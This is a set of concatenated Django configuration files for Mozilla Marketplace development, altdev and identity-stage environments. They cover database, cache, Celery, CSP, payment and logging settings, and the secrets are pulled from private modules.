# Override the limited marketplace ones with these ones from AMO. Because
# the base gets overridden in the mkt.settings file, we'll set them back again.
# Note the addition of dbg here.
AMO_LANGUAGES = (
'af', 'ar', 'bg', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa',
'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sr', 'sr-Latn', 'sv-SE',
'tr', 'uk', 'vi', 'zh-CN', 'zh-TW', 'dbg'
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
HIDDEN_LANGUAGES = (
'cy',
)
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-dev-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'addons-marketplace-altdev',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
# Pass through the DSN to the Raven client and force signal
# registration so that exceptions are passed through to sentry
#RAVEN_CONFIG = {'dsn': SENTRY_DSN, 'register_signals': True}
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-dev/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
# We upgraded to jQuery 1.9.1. Run this command to include jquery-migrate in the JS
# bundle to see which APIs and features were removed from jQuery core.
MINIFY_BUNDLES['js'].update(asset_bundles.jquery_migrated())
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Dev'
# Replace LESS with Stylus.
try:
MINIFY_BUNDLES['css'].update(asset_bundles.less2stylus())
except AttributeError:
pass
ENABLE_API_ERROR_SERVICE = True
# Until Bango can properly do refunds.
BANGO_FAKE_REFUNDS = True
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/marketplace-altdev.allizom.org.ini'
ES_USE_PLUGINS = True
# Cache timeout on the /search/featured API.
CACHE_SEARCH_FEATURED_API_TIMEOUT = 60 * 5 # 5 min.
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = 'marketplace-dev.allizom.org'
MONOLITH_INDEX = 'mktdev-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
# We'll use zippy, the reference implementation on -dev.
PAYMENT_PROVIDERS = ['reference']
PRE_GENERATE_APK_URL = 'http://dapk.net/application.apk'
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ALLOWED_HOSTS += ['.mozflare.net']
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave']['sa_pool_key'] = 'slave'
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
}
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'amqp': {'level': logging.WARNING},
'raven': {'level': logging.WARNING},
'requests': {'level': logging.WARNING},
'z.addons': {'level': logging.DEBUG},
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'mkt-dev'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons-dev.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_dev' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons-dev.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing-mkt-dev.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
GOOGLE_ANALYTICS_CREDENTIALS = private.GOOGLE_ANALYTICS_CREDENTIALS
GOOGLE_API_CREDENTIALS = private.GOOGLE_API_CREDENTIALS
MONOLITH_SERVER = 'https://monolith-dev.allizom.org'
GEOIP_URL = 'https://geo-dev-marketplace.allizom.org'
AWS_ACCESS_KEY_ID = private.AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY = private.AWS_SECRET_ACCESS_KEY
AWS_STORAGE_BUCKET_NAME = private.AWS_STORAGE_BUCKET_NAME
RAISE_ON_SIGNAL_ERROR = True
API_THROTTLE = False
NEWRELIC_WHITELIST = ['dev1.addons.phx1.mozilla.com',
'dev2.addons.phx1.mozilla.com']
NEWRELIC_ENABLE = HOSTNAME in NEWRELIC_WHITELIST
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = 'marketplace-dev.allizom.org'
SERVER_EMAIL = '[email protected]'
SITE_URL = 'https://marketplace-dev.allizom.org'
SERVICES_URL = SITE_URL
#STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-dev-cdn.allizom.org/')
STATIC_URL = os.getenv('CUSTOM_CDN', 'https://marketplace-dev.mozflare.net/')
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
CSP_FONT_SRC = CSP_FONT_SRC + (CSP_STATIC_URL,)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (
STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'dev.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
SYSLOG_TAG = "http_app_addons_marketplacedev"
SYSLOG_TAG2 = "http_app_addons_marketplacedev_timer"
SYSLOG_CSP = "http_app_addons_marketplacedev_csp"
STATSD_PREFIX = 'marketplace-dev'
# Redis
REDIS_BACKEND = getattr(private_mkt, 'REDIS_BACKENDS_CACHE', private.REDIS_BACKENDS_CACHE)
REDIS_BACKENDS_CACHE_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_CACHE_SLAVE', private.REDIS_BACKENDS_CACHE_SLAVE)
REDIS_BACKENDS_MASTER = getattr(private_mkt, 'REDIS_BACKENDS_MASTER', private.REDIS_BACKENDS_MASTER)
REDIS_BACKENDS_SLAVE = getattr(private_mkt, 'REDIS_BACKENDS_SLAVE', private.REDIS_BACKENDS_SLAVE)
REDIS_BACKENDS = {
'cache': REDIS_BACKEND,
'cache_slave': REDIS_BACKENDS_CACHE_SLAVE,
'master': REDIS_BACKENDS_MASTER,
'slave': REDIS_BACKENDS_SLAVE,
}
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = False
SENTRY_DSN = private_mkt.SENTRY_DSN
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
SOLITUDE_HOSTS = ('https://payments-dev.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
VALIDATOR_IAF_URLS = ['https://marketplace.firefox.com',
'https://marketplace.allizom.org',
'https://marketplace-dev.allizom.org']
# Override the limited marketplace ones with these ones from AMO. Because
# the base gets overridden in the mkt.settings file, we'll set them back again.
# Note the addition of dbg here.
AMO_LANGUAGES = (
'af', 'ar', 'bg', 'ca', 'cs', 'da', 'de', 'el', 'en-US', 'es', 'eu', 'fa',
'fi', 'fr', 'ga-IE', 'he', 'hu', 'id', 'it', 'ja', 'ko', 'mn', 'nl', 'pl',
'pt-BR', 'pt-PT', 'ro', 'ru', 'sk', 'sl', 'sq', 'sr', 'sr-Latn', 'sv-SE',
'tr', 'uk', 'vi', 'zh-CN', 'zh-TW', 'dbg'
)
LANGUAGES = lazy(lazy_langs, dict)(AMO_LANGUAGES)
LANGUAGE_URL_MAP = dict([(i.lower(), i) for i in AMO_LANGUAGES])
HIDDEN_LANGUAGES = (
'cy',
)
BLUEVIA_SECRET = private_mkt.BLUEVIA_SECRET
#Bug 748403
SIGNING_SERVER = private_mkt.SIGNING_SERVER
SIGNING_SERVER_ACTIVE = True
SIGNING_VALID_ISSUERS = ['marketplace-dev-cdn.allizom.org']
#Bug 793876
SIGNED_APPS_KEY = private_mkt.SIGNED_APPS_KEY
SIGNED_APPS_SERVER_ACTIVE = True
SIGNED_APPS_SERVER = private_mkt.SIGNED_APPS_SERVER
SIGNED_APPS_REVIEWER_SERVER_ACTIVE = True
SIGNED_APPS_REVIEWER_SERVER = private_mkt.SIGNED_APPS_REVIEWER_SERVER
HEKA_CONF = {
'plugins': {'cef': ('heka_cef.cef_plugin:config_plugin', {
'syslog_facility': 'LOCAL4',
# CEF_PRODUCT is defined in settings_base
'syslog_ident': CEF_PRODUCT,
'syslog_priority': 'INFO'
}),
},
'stream': {
'class': 'heka.streams.UdpStream',
'host': splitstrip(private.HEKA_CONF_SENDER_HOST),
'port': private.HEKA_CONF_SENDER_PORT,
},
'logger': 'addons-marketplace-dev',
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = True
GOOGLE_ANALYTICS_DOMAIN = 'marketplace.firefox.com'
# Pass through the DSN to the Raven client and force signal
# registration so that exceptions are passed through to sentry
#RAVEN_CONFIG = {'dsn': SENTRY_DSN, 'register_signals': True}
# See mkt/settings.py for more info.
APP_PURCHASE_KEY = DOMAIN
APP_PURCHASE_AUD = DOMAIN
APP_PURCHASE_TYP = 'mozilla-dev/payments/pay/v1'
APP_PURCHASE_SECRET = private_mkt.APP_PURCHASE_SECRET
# We upgraded to jQuery 1.9.1. Run this command to include jquery-migrate in the JS
# bundle to see which APIs and features were removed from jQuery core.
MINIFY_BUNDLES['js'].update(asset_bundles.jquery_migrated())
MONOLITH_PASSWORD = private_mkt.MONOLITH_PASSWORD
# This is mainly for Marionette tests.
WEBAPP_MANIFEST_NAME = 'Marketplace Dev'
# Replace LESS with Stylus.
try:
MINIFY_BUNDLES['css'].update(asset_bundles.less2stylus())
except AttributeError:
pass
ENABLE_API_ERROR_SERVICE = True
# Until Bango can properly do refunds.
BANGO_FAKE_REFUNDS = True
if NEWRELIC_ENABLE:
NEWRELIC_INI = '/etc/newrelic.d/marketplace-dev.allizom.org.ini'
ES_USE_PLUGINS = True
# Cache timeout on the /search/featured API.
CACHE_SEARCH_FEATURED_API_TIMEOUT = 60 * 5 # 5 min.
WHITELISTED_CLIENTS_EMAIL_API = private_mkt.WHITELISTED_CLIENTS_EMAIL_API
POSTFIX_AUTH_TOKEN = private_mkt.POSTFIX_AUTH_TOKEN
POSTFIX_DOMAIN = DOMAIN
MONOLITH_INDEX = 'mktdev-time_*'
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = private_mkt.IARC_PASSWORD
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_ALLOW_CERT_REUSE = True
# We'll use zippy, the reference implementation on -dev.
PAYMENT_PROVIDERS = ['reference']
# Since Bango won't actually work on -dev anyway, may as well make it the
# reference implementation anyway.
DEFAULT_PAYMENT_PROVIDER = 'reference'
PRE_GENERATE_APKS = True
PRE_GENERATE_APK_URL = 'http://dapk.net/application.apk'
########NEW FILE########
__FILENAME__ = settings_base
"""private_base will be populated from puppet and placed in this directory"""
import logging
import os
import dj_database_url
from lib.settings_base import (ALLOWED_HOSTS, CACHE_PREFIX,
CSP_SCRIPT_SRC, CSP_FRAME_SRC, ES_INDEXES,
KNOWN_PROXIES, LOGGING, HOSTNAME)
from .. import splitstrip
import private_base as private
ENGAGE_ROBOTS = False
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = private.EMAIL_HOST
DEBUG = False
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = False
SESSION_COOKIE_SECURE = True
REDIRECT_SECRET_KEY = private.REDIRECT_SECRET_KEY
ADMINS = ()
DATABASES = {}
DATABASES['default'] = dj_database_url.parse(private.DATABASES_DEFAULT_URL)
DATABASES['default']['ENGINE'] = 'mysql_pool'
DATABASES['default']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
DATABASES['slave'] = dj_database_url.parse(private.DATABASES_SLAVE_URL)
DATABASES['slave']['ENGINE'] = 'mysql_pool'
DATABASES['slave']['OPTIONS'] = {'init_command': 'SET storage_engine=InnoDB'}
SERVICES_DATABASE = dj_database_url.parse(private.SERVICES_DATABASE_URL)
DATABASE_POOL_ARGS = {
'max_overflow': 10,
'pool_size': 5,
'recycle': 30
}
SLAVE_DATABASES = ['slave']
CACHES = {
'default': {
'BACKEND': 'caching.backends.memcached.MemcachedCache',
'LOCATION': splitstrip(private.CACHES_DEFAULT_LOCATION),
'TIMEOUT': 500,
'KEY_PREFIX': CACHE_PREFIX,
},
}
SECRET_KEY = private.SECRET_KEY
LOG_LEVEL = logging.DEBUG
## Celery
BROKER_URL = private.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
NETAPP_STORAGE = private.NETAPP_STORAGE_ROOT + '/shared_storage'
MIRROR_STAGE_PATH = private.NETAPP_STORAGE_ROOT + '/public-staging'
GUARDED_ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/guarded-addons'
UPLOADS_PATH = NETAPP_STORAGE + '/uploads'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
SIGNED_APPS_PATH = NETAPP_STORAGE + '/signed_apps'
SIGNED_APPS_REVIEWER_PATH = NETAPP_STORAGE + '/signed_apps_reviewer'
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
HERA = []
LOGGING['loggers'].update({
'z.task': {'level': logging.DEBUG},
'z.hera': {'level': logging.INFO},
'z.redis': {'level': logging.DEBUG},
'z.pool': {'level': logging.ERROR},
})
REDIS_BACKEND = private.REDIS_BACKENDS_CACHE
REDIS_BACKENDS = {
'cache': private.REDIS_BACKENDS_CACHE,
'cache_slave': private.REDIS_BACKENDS_CACHE_SLAVE,
'master': private.REDIS_BACKENDS_MASTER,
'slave': private.REDIS_BACKENDS_SLAVE,
}
CACHE_MACHINE_USE_REDIS = True
RECAPTCHA_PUBLIC_KEY = private.RECAPTCHA_PUBLIC_KEY
RECAPTCHA_PRIVATE_KEY = private.RECAPTCHA_PRIVATE_KEY
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' % RECAPTCHA_PUBLIC_KEY)
TMP_PATH = os.path.join(NETAPP_STORAGE, 'tmp')
ADDONS_PATH = private.NETAPP_STORAGE_ROOT + '/files'
SPIDERMONKEY = '/usr/bin/tracemonkey'
# Remove DetectMobileMiddleware from middleware in production.
detect = 'mobility.middleware.DetectMobileMiddleware'
csp = 'csp.middleware.CSPMiddleware'
RESPONSYS_ID = private.RESPONSYS_ID
CRONJOB_LOCK_PREFIX = 'marketplace-identity-stage'
BUILDER_SECRET_KEY = private.BUILDER_SECRET_KEY
BUILDER_VERSIONS_URL = "https://builder-addons.allizom.org/repackage/sdk-versions/"
ES_HOSTS = splitstrip(private.ES_HOSTS)
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = dict((k, '%s_identity_stage' % v) for k, v in ES_INDEXES.items())
BUILDER_UPGRADE_URL = "https://builder-addons.allizom.org/repackage/rebuild/"
STATSD_HOST = private.STATSD_HOST
STATSD_PORT = private.STATSD_PORT
STATSD_PREFIX = private.STATSD_PREFIX
GRAPHITE_HOST = private.GRAPHITE_HOST
GRAPHITE_PORT = private.GRAPHITE_PORT
GRAPHITE_PREFIX = private.GRAPHITE_PREFIX
CEF_PRODUCT = STATSD_PREFIX
ES_TIMEOUT = 60
EXPOSE_VALIDATOR_TRACEBACKS = True
KNOWN_PROXIES += ['10.2.83.105',
'10.2.83.106',
'10.2.83.107',
'10.8.83.200',
'10.8.83.201',
'10.8.83.202',
'10.8.83.203',
'10.8.83.204',
'10.8.83.210',
'10.8.83.211',
'10.8.83.212',
'10.8.83.213',
'10.8.83.214',
'10.8.83.215',
'10.8.83.251',
'10.8.83.252',
'10.8.83.253',
]
NEW_FEATURES = True
REDIRECT_URL = 'https://outgoing.allizom.org/v1/'
CLEANCSS_BIN = 'cleancss'
UGLIFY_BIN = 'uglifyjs'
CELERYD_TASK_SOFT_TIME_LIMIT = 240
LESS_PREPROCESS = True
XSENDFILE_HEADER = 'X-Accel-Redirect'
ALLOW_SELF_REVIEWS = True
MONOLITH_SERVER = 'https://monolith.allizom.org'
GEOIP_URL = 'http://geo.marketplace.allizom.org'
API_THROTTLE = False
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + ("https://firefoxos.anosrep.org",)
CSP_FRAME_SRC = CSP_FRAME_SRC + ("https://firefoxos.anosrep.org",)
AES_KEYS = private.AES_KEYS
########NEW FILE########
__FILENAME__ = settings_mkt
"""private_mkt will be populated from puppet and placed in this directory"""
from lib.settings_base import *
from mkt.settings import *
from settings_base import *
import private_mkt
DOMAIN = 'identity-stage-marketplace.allizom.org'
SERVER_EMAIL = '[email protected]'
SITE_URL = 'https://identity-stage-marketplace.allizom.org'
SERVICES_URL = SITE_URL
STATIC_URL = 'https://identity-stage-marketplace-cdn.allizom.org/'
LOCAL_MIRROR_URL = '%s_files' % STATIC_URL
MIRROR_URL = LOCAL_MIRROR_URL
CSP_STATIC_URL = STATIC_URL[:-1]
CSP_IMG_SRC = CSP_IMG_SRC + (CSP_STATIC_URL,)
CSP_SCRIPT_SRC = CSP_SCRIPT_SRC + (CSP_STATIC_URL,)
CSP_STYLE_SRC = CSP_STYLE_SRC + (CSP_STATIC_URL,)
BROWSERID_DOMAIN = 'login.anosrep.org'
BROWSERID_VERIFICATION_URL = 'https://verifier.login.anosrep.org/verify'
BROWSERID_JS_URL = 'https://login.anosrep.org/include.js'
NATIVE_BROWSERID_DOMAIN = 'firefoxos.anosrep.org'
UNVERIFIED_ISSUER = 'firefoxos.anosrep.org'
# This is a B2G (or other native) verifier. Adjust accordingly.
NATIVE_BROWSERID_VERIFICATION_URL = ('https://%s/verify'
% NATIVE_BROWSERID_DOMAIN)
NATIVE_BROWSERID_JS_URL = ('https://%s/include.js'
% NATIVE_BROWSERID_DOMAIN)
ADDON_ICON_URL = "%s/%s/%s/images/addon_icon/%%d-%%d.png?modified=%%s" % (STATIC_URL, LANGUAGE_CODE, DEFAULT_APP)
ADDON_ICON_URL = STATIC_URL + 'img/uploads/addon_icons/%s/%s-%s.png?modified=%s'
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
'img/uploads/previews/full/%s/%d.%s?modified=%d')
# paths for uploaded extensions
FILES_URL = STATIC_URL + "%s/%s/downloads/file/%d/%s?src=%s"
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN
# paths for uploaded extensions
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
COLLECTION_ICON_URL = STATIC_URL + '/img/uploads/collection_icons/%s/%s.png?m=%s'
MEDIA_URL = STATIC_URL + 'media/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + 'img/hub'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
PRODUCT_ICON_URL = STATIC_URL + 'product-icons'
CACHE_PREFIX = 'identity.stage.mkt.%s' % CACHE_PREFIX
CACHE_MIDDLEWARE_KEY_PREFIX = CACHE_PREFIX
CACHES['default']['KEY_PREFIX'] = CACHE_PREFIX
LOG_LEVEL = logging.DEBUG
# The django statsd client to use, see django-statsd for more.
SYSLOG_TAG = "http_app_marketplace_identity_stage"
SYSLOG_TAG2 = "http_app_marketplace_identity_stage_timer"
SYSLOG_CSP = "http_app_marketplace_identity_stage_csp"
STATSD_PREFIX = 'marketplace-identity-stage'
## Celery
BROKER_URL = private_mkt.BROKER_URL
CELERY_IGNORE_RESULT = True
CELERY_DISABLE_RATE_LIMITS = True
CELERYD_PREFETCH_MULTIPLIER = 1
WEBAPPS_RECEIPT_KEY = private_mkt.WEBAPPS_RECEIPT_KEY
WEBAPPS_RECEIPT_URL = private_mkt.WEBAPPS_RECEIPT_URL
APP_PREVIEW = True
WEBAPPS_UNIQUE_BY_DOMAIN = True
SENTRY_DSN = private_mkt.SENTRY_DSN
SOLITUDE_HOSTS = ('https://payments.allizom.org',)
SOLITUDE_OAUTH = {'key': private_mkt.SOLITUDE_OAUTH_KEY,
'secret': private_mkt.SOLITUDE_OAUTH_SECRET}
WEBAPPS_PUBLIC_KEY_DIRECTORY = NETAPP_STORAGE + '/public_keys'
PRODUCT_ICON_PATH = NETAPP_STORAGE + '/product-icons'
DUMPED_APPS_PATH = NETAPP_STORAGE + '/dumped-apps'
DUMPED_USERS_PATH = NETAPP_STORAGE + '/dumped-users'
